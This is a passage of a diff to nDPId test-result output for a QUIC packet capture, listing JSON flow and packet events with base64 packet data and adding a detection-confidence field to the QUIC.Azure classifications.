xPqEDLbbU2mUP9vwNYzNXJKG2DUAsDLDw6z7pW\/sws6BGrQtkI4MswvtPP3tTOUG\/fE\/ztGz6sn0isa49Skrr5sdjTBckHoBSXiarAL+UhWVH3IgXrw7LDIqxiqdq7nRgSKmIzhN9fAbY6UXqQ932CN1pNDdZ9w\/GGn2o7t3bhxb5QVcZtml2RlYzXpD38XPIVBBQ47INhpeNulXlv8GPqMtdWTZebqe4kY7kqcVj0cQPvIwucmOBjpmJQg7KJ7oAQf9\/GJCRUlYyPpb8UxzZhEIeu3XefRjDZNtuoutnX0dz+oXCLYmdZjfP36HFbNYRByGa5fmywec37zgU\/qlyWBC2YCwex2EfvKOy9LWsTwa0ZT8kdxRFmJEv3ynISWQk6m6ALqZbKftEzLU53Sbc5IUV0op9T4rpP0U+RHeEC5OrRZtLDz7Eoi9XXjobuI3Vg8eC4MHSuUO6V5Xv0Nf3+ekeBTC4ZPF9uBseY\/M\/dl0+yfCT+XFaXx3GicyqgVnrvdtodSYLOXs8ya9nmPO\/qYXeXC3eiFr+iktgKCZgHHx3a+niakZlOQIdnQs8m+3FjMcPGf5iRRc1au20WBWADTpVoSMiHx7In8vZZ951ksDsiVML5vgKF3uCPIZiGrbd7epc75W0H66E6MYCh6UtGfeXcH48l\/e5dYlz+GnvNtX24qdsZ8ZjyXvychZ2KIR22+ZYaEiM\/DEMB6luZTBsCO\/v2zsreln6ASIp00NFiopmG5ECaS\/wzhc7cyOYeoLY+l9laxEBYEqW7mGrKnqBUW8CdAonXxsjkGQxEgjetP14OMrGziNFo3Hmm4YUyWifAkDAA0y29APcv6DiME4DgmAODMt0L6F2HG8ByP+NbokUTWDBX+4z7Vu5mleZba895fNmU9ORQiZpsGKf5KdpS60rinWsd7H7F5AaKkK9V8ehTTA2KJN4FeRKEoVzjZNBXQIIp68V\/vTf6MjitUwkEVupaAbIqjiysCSlLtNhGoB5fG+h4bOdXHXY5aevu6eMcfIv\/VbjnB55QeiEX\/EGcg3yTCoROSaMNCGVQt7zybtKYLEAyJsZQdEzgoFSBm\/aVwsdOJLWiaQNxXr18wB2gwcynUtmY2OVRwX9j017xp7wGxmkp6fMo89Q5EZUZHfrQPUTsdLVxwrCtX8+BW19j1yLDE1jHz\/+hGjjVhkwiSSrUAMm3RWzCmyQbEXOdJpYEBon5bDAOn9LIToMnCQE86GVIS0UXQomCSYbZ4epFa1Ztm0zGdSLCKIfptcYOK6+a0cWvPAl+LZLk6bVf4IQ3VrJ2Pyo8DyjbC59d75TDSUXKmy1\/\/IRu4PkQCaoDSf88oNbPYxcEpRCESbf7WtoG6B+DEymuEdUAjcUwmOAZpwYnrVev"}
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486369476,"flow_last_seen":1621486369476,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621486369476,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
+00699{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486369476,"flow_last_seen":1621486369476,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621486369476,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1621486369781,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621486369781,"pkt":"AAAAAAAAAAQAxdZsCABFAAViaQVAAH4RW\/w0uxSvYyqF9e6hAbsFTrnVzP8AAB0I+0NvIwjQu6UAAEU03RUajo54f3xaeQcz5ShQCKZJx+hnzaoOL+d9TDb2UYj2DFEQFg8O+PU04LqxBWrWZC6Jw7FAOK24WCy0+Qq+3W2m1Yj3lW4LJIV888sWjcqqlWbULhyMA\/KD5b8qufe+TPSdlntyuZPV2pTPKi5B+SQiTyl5FD9POY3+v3rSnfowAVM2nytoVtVAXU7ajofA6WeK40X1jrJmHBb8E8rErNsDpXfZzug5wr1qdAlbwVJRdAAFYIZgoB2\/qSq5jmhYNWc\/gyOteYYnvauiknHb14gnDW9kJk2AXthTxKyTuNGMMxIe8\/+57XTEdXgzJjfVFWlgu2dHS8t\/0D3vzl8kg3nUD3Et77FL6IMLHaLSMukGOY1oBOkzjqX9K7VF4oQZRG9WjeL8sHkc22npUwO8iu8Bg0QKzz6y1u\/WTGBcWCD6mmt7brbnyRuuQgJ5OSl+aUzFnuzYJwIcGCDmEAvg+d8QzbJwb0\/ydw6dj0OMY83exGXykPAMPH7d7uEh5qtWi73l2znhazBL+P6xXiAwMP5388MuTY+jv7myTvH2QegjTUhQrSoffjxgsBE+ew2qlWyIZdlD9xSPSQjzdG892xvO+Daqm0xCPE1\/DcTBrgTsBx5zRHmldCADLkPEXpDHIwwb64NYIN\/OgJT2Txk9iwrogjaIoAbzHDjBsRD+zjRv6ke5JHSd+l5VjHM2dZF9PUtL0DvVyYUjBO9tnDbTkEoPXCgLrgUFMpYiHso39U9eNfLO5kGqcHN+eOpKAvyRZVxKbK9+4n4VOyQK+R8se+nV68oYONIx4HlUc503SyGOap\/\/LCYROiGY4eaPDh7vr94Iu30hTjCiyIlio3ENmo2Xtpgx0y4zki182URjhdi2lMGGt75JESZeZfkA34f7hLFevCumcj6ijOjzZ0u42eGs\/RX\/7\/yBrnMjY+2gfiJ4TxqZChQis\/GYKAbD2JIuzCsi6V2Ubm8Nw35KDS+sB53W6Do27E2GSA2DWv+MzAm6zveezQDVV+o4OsT5neD4AAwgLFy\/Qy2xi+GZjSkZy8RSo3iRdAs62eGy1gVfhyPrNudRwVNEuWk\/dY2itlVJ+HJ28fJnpvvX3tj8I7p1+1yZJSjalMpM5yQmgJkG9WVckV8DGAWXv3xO8cB5OugwG77mQoMStI3vQGUXlb1t4\/i+fDw\/GuS4IZc1qT+z2tWNFMto35TYb7NCelxMcXuuM+fYamAktrAw1KxhGvSXuYqr\/srgGiZhDyKLEbwtAm\/PUk8PsLr9uf3dxP9zKVSrZ3enmKDlUmAbwVi3hp78d\/5QtHvS4TMGUKLEXPCDhUSuwE7OOnJPgm+9br0i+fWDTX4tU91C\/jkplORo4Cj82ZnXtiWWPH0axQZfuh8nQGk2O3ZzNJTPqAtZI1gmIa6n7kNGEdgtaMX7Pg3vjDy68p5aVHfYpO\/dRKKWrMVDPCoBiAvp7eoWe9rRs4zHZdWniTJ3TJ\/1zSX8g\/p4+Y0B5FqL1OIXFwBjWTct4roreoqwYWuYvynwyepiVqQwZWkuHxiCkCJi1WnbBJ5iZfX\/8wWqdcHJRUcAJUNgCfoV7Ve\/zYSplpt9zSooIJyCI6uI9H8NvW80zzMgfGToxt4BHzDG95IPe8ajcFZ5KX0BoZRF14qIUNMRcwxWisnEuOIE\/Q+ayMiFBDXLhxu7NRovYXsWUIFNs5o2BFE\/MKTaf\/oZ0iEYees5KfoTm65JfoEaFJ9jS3QBRmZFIyZUE+OXP+Hcko2Pe\/+D7s3GVBk0cIMYErQi"}
 02299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1621486370391,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621486370391,"pkt":"AAAAAAAAAAQAxdZsCABFAAViaQZAAH4RW\/s0uxSvYyqF9e6hAbsFTimxxf8AAB0I+0NvIwjQu6UAAEU03bTMBGYCrS8cnv5vhFjbtc1bGvAvFQnZB6yJG8NkcrmiIIJPIXl2q4dOP10rWX5YFWQXsyHMoGvgrIcWDVzIX3NZ7o8SxUndmlIUJBVqXEfKC6th0dxYBXCRfJJYWNyYrXmuN+Y0PL58UHK7tpZpgBK7mIQyQqSMZcKAs7IPHVXv2Sv3DGgEdMifspeJLZrqAdK5aSG9OqL\/1HP9dlfRJZOn5z1AX6j5z63ULJV5lG7V5bETO20pw88dGKcT+ZGMwvA69Sd5k0J76yF4otVf+nWsZJtlYGjXtglJhDbIRllnDv+E+a46adZELPbL8K3oBj6\/CCVCE2naOyEf6mPlfsVkBDeGjKbsRBu21pYLux7J6CXacUP3TFJ44akagTX\/8xKYW3ZaCu4Q0+BcjGnTHcCQO7kjxo2v3xqEKiOBagnZztVu8xYJUV1uSp0p84BGJGssQKgY2BPdhtNjFgTRBcdgKWi1F7+kUVb\/YTbwJyuRTa+PDvQQMNFOZgaYCsfjqFJWHKG2zIwkFspCoaCF8XtQGkCq9jE6y4qf4zjPbZ7N1UwwnwdZxfWb1Fw4aktZsDsenXL8B8X0NngfTME6MDZxvWCxHmQc5ppnjDsJXBvxCfHQyc9M7d8D8CeVC+HWbU67PYxUuKsITW5a7mAaKH0WaTJ26olLUeQA3GDIUFw9xUdggvpZTPLePjQefZEEfRjRjT8iEYeb9CzGQi6t+9fTQ6pc+9Rp6a50KYQ1uCZSpODozp\/OQcBEbdR9GtmHpCDR0JSPJbtOYkVGGl9N0B1JEmNoUvWkQjGNjAZe3zsIkxaJ57mePus0qsRip0mYliPwjYjUPzsCHzNeDVwVXuWpUcUzM2mUJOgikCw6XKjTRqaWuAqeW1c9z4mZTbOSK\/TxHcCg\/WiNrzmz+WTnbB9BVLyyGE4vg7qJFN4PX2g3DqbfkifJRA9XPVuXHaYWBlDVz8FX3HNEQ6rLUkFa6eqyarqoeBLNt0e0nZn9mcxG4Qo9mD2OYNdYfux80GSAZIDpyIm8TDnnEmhS5z2HYyomgtO2Y4t\/N5FkVRx6yIfdqPtr7Ui3r9fpMCfazjmjrQ+LfRUxo6Q2p6YAAv1C6FuIqrLJVqHI\/kpJu7ZWHTe2PKlaiOnlj1A5JSK4vO\/0WUDs4dtC6LTCRT2cHR8t0Gej0FDzJ++VJbM\/YfPg8brEWZFYdpsvpeNzCryX37u4tW9MApgeHZ1fZQT7f+f0wNL3xb9nkBGv430\/o6aRXdV4rdsVK1Icwt6zKjtP4+M0EEPcPCQVgeyQEGAAiT3Uzle36U56GZffLsCMgG23H\/3Z1NKDWwffbKh1gfnfiwFVKdwun1Qt78gbk1vSqnomb\/J79AsHqjs4dj92ExlMBaeEeYS838CC1\/+GvM2TQqnNQGc0TBtsKDsLKmNN\/8BHFpN4K9oCP36JNjPgUtLnOiEpwlupSGWcDbtdi6ZFxy+Q7dsd+3esOK\/k1qXwrnT1z9erk299qqN\/tK39BUGopYzBcI7ZqtvWVyUcAQv4rkOvMHmT93EH9eAV\/HM1whxSr7kyLBcJNnJ8VG6vC+5b8Eiwd4KEvhX4SUFtdpJK\/juljSeDOnjRTvrONC\/wed2ymfPWrpUK94fPBsgVhs3zwEWHcezodeiB7xOvk8HZvWHvIdUWX23Dy5xvn5LYUigujlWn4Of6EawcMVeXgViQ66NNCX\/RKsSqrI\/0g0LQPkUhNuc1Z6LvT+izQ7m4p2uahClxy2m7stvMB02QAeTxR40TF5yA"}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486385474,"flow_last_seen":1621486385474,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621486385474,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1621486385474,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621486385474,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZZFAAH4R2lg0uxSv0OWdUcLYAbsFTiq5xP8AAB0I+aKrjQG3wPMAAEU0wuD+7fY6Iyc8tUyNR8o8NpWyUYFI2ltF3LBlXWefiS8pWcL74QB2DRW9zaYKiQLkhdAYa9TytEiykfGGocLbybyMzfU84hTMBvmtN9X8ZFMfEisph4kQ3rvmzIKxImtWYbPuenHPvncTyghAlfBjyTAs4SBTn7zgSiTlWDdrfi34xfTstE2uvPZkKaWey9pXrjtdmfzoUf\/pnc+joM+ZvbIOQcTsRmXe5mjiVNaJ6HbPiHfKS10CyjUY01LajnspTwPslYnWYHNLgwAGsyRZ3BxR6GzhK0yi77NGNugWOahmIQ6nR7Ydevwzssc8uD6\/61qD61eTpCJutHPvmpIMYyBaYt3YTvj7rWTy4+Jwluo7NCbmBS6erQnQ0BioBgOLfZKwMDge8tR1RT7fB2y73uabWZmh+z9EXiZif9vDBEIzL8O7i8XDK+n4f62Ye3t+bnf3T\/kEu06cpWij61xvDaapGt5KkkpyGLnr1+FLnojx+RRHnFHIYRBgk0R2kEDER0hHA1VeiOanzTBCFFmvwFA4TMEyQweEYvKw3Kr5NUAc2xOwhVaAL3S6xL\/Wk\/SHYOYp5f0PvIEoO7\/8io\/mEJnGHY\/3kgfXj71k\/T3+r2XctxV8PD3XFXtFnV1FZeROEc3BUlMypjGko0Tbxn8TLjIbiqBt40oHwVFVvr3zGWD1h4RU4S4gf9uyP8Ze+YtGqGo434thBMwnGvfjKdLhQJtIVyNEqyYwuvEvQSBGG+kgp7fWxhCxs3+fbhPQTRYk\/v3WUK2SO9YuJEstt\/h2vF9QgTemr9AIjZTwspLB5lVyViciTmGq8Sv0ccZicPe8AazPdv40uBUNsLwlJBWnFFcDvymaaOS6K09cWBdy0mbrwp8\/Qf2j\/wwjY+o0OYJsGRCGGQ6ET57ektTFjrSGOVwqV9ScfzX5znZD+H6kwkBf1O5IzmA+\/GA1wqzC5J9sUPvKCTirqPecQIYYVquKinZKzhsDVhUADXpFT0udOlKR0uhkOCRqJsNTXL\/mafXS3+PSGh99iH51SwtUUJntU0BR8enFfk1SrdSRAr8wyz4qsVel4jzWEdUfHV\/P86FFH+QEw1abjB2h3SRqAAOHmAfcG\/uY9ox6u2GzMWSaZnsaTqOVBeLeWcQzhkrU9Z0XOCXuT8oREqaNA5FtJW8KWw4W7AgsJOgQ6KKmOhxh\/Sa9xvwEc+UXuYo4+9\/295WwLPUiqlmI80sZ5MoN\/M3QtOiUpRW6uU50HQdEXpljpfNX1Ul8JoBTMhvcJ5NW+FyRXYKNMfEEmEJ\/bvF3\/j1YI05JniGjM6mnl++dN8BP+GVMRR9DzF5J5ULbCVwM0AAMJLiLlwhwq9U40MTPoWJnoX9YFggLWwj9lQC065dWBen4MPGk26TfmuuXGV+X8k4iX8RotxUbiRr+NVmhdaVnI0o8YdFg4IeDNDlpwLL0St6sT5ZrmettHNngu+I1PPObx1u4\/0P0MqDPvazomUz93QZhJKVKT9C6LEyLYcSjxTGXp1+z4ZDBBfwlu0ys9uEElkGFm3wDpJMIW9I5cCW\/YYdHy79zUfD6w9hQ\/hirJGoMOzA0yz\/\/oESSV5DpdQtEEpQVf+pa4YsPzNg2XIlz8e+OjE7mj5zn0kQEz19jUtEba97CNXLU5+IwcQj89kSD6mwJqhhNAA9qbQHiUlU2rWwCsntFwUpKLMMcVCHYrVsOlaOMOyK7dkwME8jMVzZFIiv19xEqG38D3uh5T3lqXB4+cO87sUlV0VfbSVX2jiLZmUKp"}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486385474,"flow_last_seen":1621486385474,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621486385474,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
+00700{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486385474,"flow_last_seen":1621486385474,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621486385474,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1621486385780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621486385780,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZZlAAH4R2lA0uxSv0OWdUcLYAbsFTtWuzv8AAB0I+aKrjQG3wPMAAEU0pYnq3I+Pk4UybR9VBssX3rW2MX9MykXuwtEl37HZjZdvUwqOPILmOs1ug3ZVyVxysW\/GbunfQvoEKJNeJUHr7ARioYosUv\/iMtw3zJNnqitKNycrvEvR+KPtynwqcEskqC+a0DoLcVg8G+1ytgtC5bHkcrgb6c+yvfYPM6bQHRedo3fqBnUH\/vo++7E8FATzPknFujoxXAfIqx5\/yGoMqH+HqtaMj\/gBvnONUQgLifilr2pN2X5UZtCvWUHfwSy\/ewC4h8t+MC5HX5kjR\/I\/PEFr21ZhBOTbRAIvsPlTMMkPaVFoJeMhvSPXH3RCxFq+4eYuMrUD0OhNOcPxOIZDZCyl0o\/ggv2DFXNJg+gVLPXoZbPB4iu5Uhmke6bpE2jqTUZPjwXEkBe6xV6sp6bLYYcswATmdDqFUEdmWGMKBAsMqXikUGSk8uiqTt95fjHy8nJN41GX4xtHHAni0YyIelafqSbckoVL1qDANQr0CxF7G13sR9plFiWW7O5A7e7cS9pe6mRYIxMGaciOe9ievt36yTBJgl\/fiQ\/Mz7Rf\/0\/xEHpiGjimSZGMLJKt8tbPUkf1Doy0L2PCwY6LPbySmFk83DrXfORYqZzQC5aRkTc2HeUqrMm4bElbKJ5gKch3VNRryw25TpUnRtQFu9IMWDE5dX\/3mWizx7+qMJm47Fyoex2QVEdKtHErz\/i5jbltyKP+JlYh\/5iVhFxWpfjDpTOkH+CE\/A7gJzr87sNP+7VuTghxvarGALGRQvWB3CXNIrBOCA9jEhQerKbB8C97DJMm5tcWUZ65E7AYZouY8+zkDggzBLI+0JJ05RIaaHlApiwpsWJ2zl6F1m9w14xWaghs7jZgtgfJEpGiT74jl4pf2klaE21HmQ3jnkf6AGhbgdZBQmCO4EIpeWJZsQhwGl5VQuea9a84+ee5DEZk764Ux2ytifgViB44NxlhtfksBdQI6G+PUXELugH4wQ6SukmCIBACuFIfzQbiKGjpnRUkS7AmxTtYPrsIuSjFIrLSGd\/5Xekm02vVOPCc7EG+Woa7OletCxnuTQjLX8oheX0o2Op+1dBXeNai8Q63RlSaVEOBjEiXQnmJ5lR4kLHJAKgnnUly9\/g84JyqUljiN\/e8uABODq7kynlT0o2IN5CHpN2XfhoXZlxt2HiDrqvNzSKO3CpTZnnkJeJtK9cjSU1XxfkGr1TK+WrsxaOx2y4S6PIiErYJnObHfsCoROfZB5v6WjVW4TwLRypWRXulBOZly5TnbMAqCFsdN0gy6amJt3ngyiI1muUKlcYOXXmBVBPpum\/+c5TkiBPy0hZUTn3PK8vRrELBxFuvPrWR1GEbulof1jbR58Ncmb0rjGewwYSLgqvfw8fWuUbbODAYVLX15bmDoErj\/57wyWqkBS8kUoD3JZecSRs8Aps02NKyynCKHOlNpc8OBgCA4Ad6xJZK3IyyURTyz5JvyG0vAoHB8Htl9cCeXJkHl+hbzHpVtzHZa9PuVxTwrw5ZpWXJ3D7gYDf3YjByo50t9uNuwO1TdW6VEIoQ2YFWco6RoRPd9mEfRhGyA\/HMeXm4nHmXXkUxD0lWGhQ1X301intynkww+5gju+t6izkuTyIR+es3wNgXF3uDXXchyNcpEgdq6KXfVdg\/FtdXzMb3o20tlnu0aGTS9Ke8r2K9x5Uy5E4IMaNx46xDz\/FHeQCHMCFloD7HC0iGeHQTjamzHYw9Q9cx0UPZlEZjKGZ\/W9mm9Rh0pSLgVkS1htsYD6Bvo2h8czyqOaZf"}
 02299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1621486386389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621486386389,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZZpAAH4R2k80uxSv0OWdUcLYAbsFTowYzv8AAB0I+aKrjQG3wPMAAEU063sPCo4ozMPxlUj\/bSPtY3+CzlLdcC7kUprewEjKm2OTMB65C2RpyTFK0qHd1UzUnN6U5dQGGKmwgsbIXIKSBC7aC9lk9\/7KSXCk70eFVpjOtIDpiKUi8vVDCcfV6kRbykQ1UG60rnGaessWOlmJYYUYrFTLfQgo1LVYDsFKsPtJ1s1kupvZUz7DtsLylFS2l34GkqtIScglkyae0GI8mViRVebeilzlJSvddjOZxdAXXrNZAwRXdoffLloV5HtcoTQxqkR0GAPQdvrWXk+SMlGx\/W7Ne49MxOoYqcb+ZEW\/cA0RMhYOyvvzwyDA6S9WR2IZmDOEetLTQcoqKQrcTga50K8d4JAO4kVEikYFtr5Bm1z+MiARlDwUJIa24qTqLJVIo5iKqG52c5DO3tsvK0vzd8pSllrOHA6f\/I4wQDPyPJtMgg5O1ZoG8De8l3r2ufSRHsnJkEpyqWGF1+ijD\/7lBI\/5nWTPn9fBbdQQQkTlCH2+hn3jyqGiasIwS76cDfQW7wvTATHGizCtUCL9RDngXJ4m60+cjB0gourDm90bfqwSQs1xt55IkE5JsBrjydZPyipe0uhIjm4KZxuvhAjYi7daB1ce\/\/+407cCf+sxxL7CWqTVDAtgj6KFZbP4hnyT9ga4vkmC3\/t2CtLgFM4\/LEuF4nmXrGayZvHNNVuso5WMvbM4gno9LWsv2kJV4dX1TThhLd\/wIxSNzjl0dXSOBZ7wgJEHEnznJuFVstXb3tQcV7X3RP\/hcXpU9XjjFPCV5oo1sQe64QtneNkxV2yjvvs4fEGTk+zfZAnlMw\/iFw5VrPsMS\/wDar7RyJvWTPrIcoFDMu0pl6zkP5Al5BXrxcNMZVEAv6FlHk7RldT5vteKHFUD2EG202+PzEtOTPlmqNG6eE17A10kl4\/4bK9PAjRlBlsdbWm59jtIwieLuyVkY3xNNoXmkXmw+HTfj8L6cgMab+8MVWKD6X2FNJX1Hh4plar7gQs1wBHs\/50jh9TX5uIoGdQRaAkCjse9rKdwxS\/mQ3AZwSCeTLDSDZ7HNKOkFvE4XF72wS8k1jEs8CQLMd5eF7YKEIwhKqSRCTAxxeIp83q7tXfO3G8oxX8DNBZyGPdzHTcD2B2+WzAACX+B3mJrQJ47ogTtd7hRxPzmVNoKxW1cJA2W8sth9y2x0M4tQfFNCg+y7Hjysh4guq6xCuiVT5xotwMwPSDBGNIuXj+rftzi7znrhrNAbCSXiAYGtGnmHBOghmDMitk72DkuK88UEA04IW2\/8fbI46r27QDrpS7pjckWTOaGJMfuh8JgHCaU9F5gWqtRhso3KChbMMFYhYXX8heyFp2QTjtSXCvmSvOb\/P4Saj9keRyVu6EwxUD\/Wvi1CQPZNexfLJTr4d0fY2EFznG9mLwUFqLk8x93VjpNxh9mUDOT+9FkN2OUAwfOdunZk+S7EQYfuz58Zq50dfTTQ4ytc1corJ8ZnuRFp7bcXIyr+r\/g0rxcm55mxTcduuOI43k6A\/u4kxcszhmg9OmUhSIdiyIqrI4cTDkvXweJOztAO+v1eNUC8H68zvSWSCyYfBS09v+biPzskrJYVcIdvRbgzNi1MALIo64umFnfoGW7g7tdRnTTtUaVJ7SjjCNftNOmI+oKGp0G6qA+uKDhFNzBEwpKt7nPh7uh8czyGQ5haYxO+MQIP6acb8ITWfq7ZBDLBK87VY24JBoDq6EX9\/nCN65uCe1Ka7quGr3dV6rIOhhe19uIvRjiUm2GbcXkIV4PPI8eo8VJ"}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621486316206,"flow_last_seen":1621486318293,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621488172593,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -310,71 +310,71 @@
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621486369476,"flow_last_seen":1621486371605,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621488172593,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621488172593,"flow_last_seen":1621488172593,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621488172593,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1621488172593,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621488172593,"pkt":"AAAAAAAAAAQA2lQ0CABFAAViZb1AAH4R06SfdbB80OWdUePhAbsFTly0xv8AAB0IIYJbjKvcKZMAAEU0Tezktqb5jgj7Ctco9B1gEgebhfTklfJiWUvzvzXVx1e1KCfmB0CYkpgvAEMWkCN96k4yxgEJhItMoJtLxBJKjThyVwVNoJs4osfVKgvW27jc\/\/cMoYfkmt0BcMTE+S832TZqo7DcoxbJ4SED5T\/fELYc1YonSB\/W876e8faG5n9Z889N6aEcUSpAR1NRv\/LUdTkKc80E8eLY0MsHFlrDxy6CZovHJ1EZPsnxPU3xmuA6PKcoVZk5E7PnwPJWVDykRwGVsj3\/uqwsCOxMLScufsvGchEffztJ8Mjpf1xy0Hks4XzejPQm1+YDaRsdxSWXt45SRLIvo\/c6h5H5fCX4yZ2dh6e24j40pDTautPP1E4KkxfA2AopSrSKSf1UiAUXmQWbN\/kgMU18r7h5LyzlAMKuX8\/Ay6yq9jK87jtj+MI